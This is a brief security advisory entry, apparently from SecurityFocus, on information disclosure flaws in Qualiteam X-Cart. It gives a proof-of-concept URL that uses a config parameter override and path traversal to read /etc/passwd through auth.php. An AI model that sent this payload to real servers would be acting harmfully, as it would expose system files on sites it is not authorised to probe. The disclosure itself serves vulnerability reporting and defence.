Qualiteam X-Cart Multiple Remote Information Disclosure Vulnerabilities

No exploit is required to leverage this issue.

The following proof of concept has been provided:

http://servername/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus